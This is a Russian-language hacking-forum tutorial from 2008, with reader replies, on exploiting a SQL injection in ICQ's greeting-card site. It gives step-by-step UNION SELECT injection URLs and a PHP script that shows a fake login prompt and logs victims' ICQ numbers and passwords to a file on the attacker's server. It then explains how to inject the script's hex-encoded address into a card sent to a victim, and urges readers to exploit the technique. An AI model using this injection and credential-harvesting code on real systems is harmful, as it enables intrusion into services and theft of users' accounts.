Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Icq# через Icq.com (https://forum.antichat.xyz/showthread.php?t=64647)

Scipio 18.03.2008 11:15

используем уязвимость на Icq.com
 
ICQ# через ICQ.COM

Вводное слово:

Статьи писать, дело неблагодарное. С одной стороны для людей продвинутых написанное является бояном и не достойным внимания, с другой стороны для начинающих «хакеров» многое кажется непонятным, в конце концов, и те и те остаются недовольны, а найти золотую середину может или педагог или писатель, коими я не являюсь, так что не судите строго

В статье будут ссылки на статьи:

[cash] Проведение Инъекций в MSSQL сервер от Microsoft. http://forum.antichat.ru/thread30501.html
NOmeR1 Заходим в Icq через Xss: http://forum.antichat.ru/thread53850.html
hidden Применение Basic Authorization против форумов: http://forum.antichat.ru/showthread.php?t=20911
А также советую посмотреть различные статьи по XSS

Приступим:

Как то давно, блуждая по ICQ.com набрел я на sql инъекцию, правда инъекция была бесполезной т.к. ограничивалась только 11-ю символами, но факт наличия инъекции обрадовал, значит не все потеряно, гуляя по ссылкам я набрел вот на это:
Код:

http://greetings.icq.com/greetings/cards/254/
http://greetings.icq.com/greetings/cards/254-1/
http://greetings.icq.com/greetings/cards/253/

Наличие инъекта налицо, подобрав кол-во столбцов с помощью order by я узнал что их 19:
Код:

http://greetings.icq.com/greetings/cards/253 order by 19/
сотавив sql запрос с конструкцией UNION SELECT:
Код:

http://greetings.icq.com/greetings/cards/253 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--/
я и не рассчитывал на успех (действительно наивно предполагать что icq.com работает на mysql, который демократичен к типам полей), предположив, что я имею дело с TransactSQL я составил запрос:
Код:

http://greetings.icq.com/greetings/cards/253 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--/
Как я и ожидал, ошибки не было, дело за малым, подобрать типы полей, сначала числовые, для этого нужно поочередно вместо каждого null подставлять число например 1, и там где не будет ошибки (у нас редирект) там и будет числовое поле:
Код:

http://greetings.icq.com/greetings/cards/-253 union select null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/
видим, что значение raters у нас с 0 изменилось на 1, после того как я подобрал все числовые поля пришло время подбирать строки, для этого можно (рекомендую) изначально использовать строки без кавычек, а попросту захексить, например пресловутое 0x3a:
Код:

http://greetings.icq.com/greetings/cards/-253 union select null,0x3a,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/
в принципе одного поля вполне достаточно, но можно подобрать и все, далее просто узнаем версию и все остальное с помощью стандартных TSQL функций:
Код:

http://greetings.icq.com/greetings/cards/-253 union select null,@@version,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/
Цитата:

Adaptive Server Enterprise/15.0.1/EBF 14210 ESD#2/P/x86_64/Enterprise Linux/ase1501/2400/64-bit/OPT/Fri Jan 12 17:45:01 2007
Угу, SYBASE ASE 15.0.1
Дабы искушать начинающих на изучение инъекций в TSQL не буду приводить дальнейшие действия, как например получение схемы БД и т.д. скажу только что для просмотра «самой интересной» базы прав пользователя не хватает, при раскручивании инъекции очень поможет статья [cash]`а Проведение Инъекций в MSSQL сервер от Microsoft. т.к. SYBASE и MSSQL очень похожи.
К тому же цель данной статьи немного другая.

Продолжаем:

Искав выгоду и другие инъекции, я нашел такую интересную штуку:
Код:

http://greetings.icq.com/greetings/cards/169-1/send#send_scope
отсылку поздравительных карточек на почту или на icq номер. Сразу скажу что для этого надо авторизоваться на сайте и советую под левым номером, благо дело регистрация труда не составляет и времени не отнимет. Ну так вот, проделав вышеописанные действия для получения кол-ва и типов полей я узнал вот что:
Код:

http://greetings.icq.com/greetings/cards/-169 union select 0x3a3a3a,0x3a,0x55,111,111,111--/send#send_scope
Цитата:

<div class="d-sph-10">&nbsp;</div>
<img src=":::" width="610" height="407" border="0" class="d2-3-img">
<div class="d-spvh-13">&nbsp;</div>
т.е. первое поле в запросе отвечает за адрес картинки/flash-объекта.
Отослав с помощь формы полученное себе на мыло я получил письмо от ICQ Greetings <ICQ.Greetings@icqweb-m01.icq.aol.com>:
Цитата:

Hi!
ICQ# 428347403 (aaa@dsfdffd.fd) has sent you a greeting card from icq.com.
To view your card, click on the link below or copy & paste it into your browser's address box.

http://www.icq.com/greetings/cards/1853243/s2hestk9/view/
Проследовав по ссылке я увидел то, что и должен был увидеть.
Вспомнив статью hidden`а Применение Basic Authorization против форумов я написал скрипт и залил его на сервер, скрипт такой:
PHP код:

<?php
  header
("Content-type: image/png");
  
$im ImageCreateFromPng("1.PNG");
  
$fp1 fopen("time.txt""a+");
  
fputs($fp1date("F j, Y, H:i",time())."\n"); fclose($fp1);
  
$login $_SERVER['PHP_AUTH_USER'];
  
$pass  $_SERVER['PHP_AUTH_PW'];
  if ((
strlen($login)<5) || (strlen($login)>9)||(strlen($pass)<4))
     {
      
Header('HTTP/1.1 401 Unauthorized');
      
Header('WWW-Authenticate: Basic realm="Enter ICQ# and password"');
      
$im ImageCreateFromPng("2.PNG");

     }
     else
     {
     
$content=$login.':'.$pass."\n";
     
$fp fopen("log.txt""a+");
     
fputs($fp$content);
     
fclose($fp);
      }

  
imagepng($im);
  
imagedestroy($im);

?>

полностью скрипт пояснять я не буду, т.к. все отлично написано в статье hidden`а, скажу лишь, что 1.PNG это рисунок высотой 407 и шириной 610 пикселей с поздравительным изображением (для меньшего палева), 2.PNG – рисунок с такими же размерами, с белым фоном и надписью красного цвета:
Цитата:

ICQ# and/or password are incorrect. Please fill in your details again
в файл time.txt будет записано время заходов на эту картинку, в log.txt логины и пароли.
называем скрипт например 1.php и захексим полный путь до скрипта: http://site/1.php -> 0x687474703A2F2F736974652F312E706870
дальше просто вставляем это в первое поле инъекта и отправляем жертве:
Код:

http://greetings.icq.com/greetings/cards/-169 union select 0x687474703A2F2F736974652F312E706870,0x3a,0x55,111,111,111--/send#send_scope
жертва получит письмо с содержанием, которое я описал выше, и при переходе по ссылке увидит окно Basic Authorization c просьбой ввести номер icq и пароль.

Заканчиваем:

Да немного народу на это ведется но и фантазия Соц. инженеров безгранична, особенно сейчас, когда стали модны социальные сети, например можно сделать редирект на фейк, который описал в своей статье Заходим в Icq через Xss NOmeR1. Вобщем мое дело показать, ваше дело эксплуатировать.

Спасибо за прочтение. Scipio

inlanger 18.03.2008 14:06

Спасибо, давно я не читал интересный статей :)
жирный плюс

Alexsize 18.03.2008 17:39

У меня не работает уже.

IIAHbI4 18.03.2008 21:31

Цитата:

Сообщение от Alexsize
У меня не работает уже.

аналогично.но статья интересная.

CaNNabi$ 18.03.2008 23:35

Так че не работает уже?(
А статья 5 баллов)

Scipio 19.03.2008 18:39

Должно все работать, только что попробовал, все работает

ЗЫ Спасибо всем за хорошие отзывы

Scipio 22.03.2008 06:11

вобще там около 5 скулей я нашел или больше, реально сервис бажный, жалко только прав маловато, но при определенном умении и из этого можно кое что выжать


Время: 20:51